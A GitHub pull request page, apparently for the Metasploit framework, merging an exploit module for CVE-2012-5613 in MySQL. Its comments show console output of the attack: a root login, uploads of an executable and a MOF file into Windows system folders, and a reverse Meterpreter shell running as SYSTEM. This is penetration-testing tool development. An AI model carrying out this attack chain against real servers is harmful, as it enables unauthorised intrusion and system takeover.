Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2012-5613: That MySQL 0day "Stuxnet" tekniq thingy #1132

Merged
merged 3 commits into from Dec 6, 2012

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Dec 6, 2012

This is one of kingcope's MySQL "0days". I decided to add it due to CVE coverage, and it adds another attack vector to a pentest. Who knows, maybe sometimes people need to test this.

Demo:

msf  exploit(mysql_mof) > check
[*] The target appears to be vulnerable.
msf  exploit(mysql_mof) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:3306 - Attempting to login as 'root:goodpass'
[*] 10.0.1.6:3306 - Uploading to 'C:/windows/system32/iwMva.exe'
[*] 10.0.1.6:3306 - Uploading to 'C:/windows/system32/wbem/mof/FgQpn.mof'
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.6:1596) at 2012-12-06 03:59:50 -0600

meterpreter >

@jvazquez-r7
Copy link
Contributor

Working fine:

msf  exploit(mysql_mof) > exploit
[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.132:3306 - Attempting to login as 'root:root'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/nWGAY.exe'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/wbem/mof/sYzYO.mof'
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.132:1044) at 2012-12-06 11:32:47 +0100
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@jvazquez-r7
Copy link
Contributor

Added support for FileDropper, merging:

msf  exploit(mysql_mof) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.132:3306 - Attempting to login as 'root:root'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/JNCQt.exe'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/wbem/mof/QaEfD.mof'
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.132:1303) at 2012-12-06 12:01:12 +0100
[+] Deleted wbem\mof\good\QaEfD.mof
[!] This exploit may require manual cleanup of: JNCQt.exe
meterpreter > 

@jvazquez-r7 jvazquez-r7 merged commit 18f4df0 into rapid7:master Dec 6, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants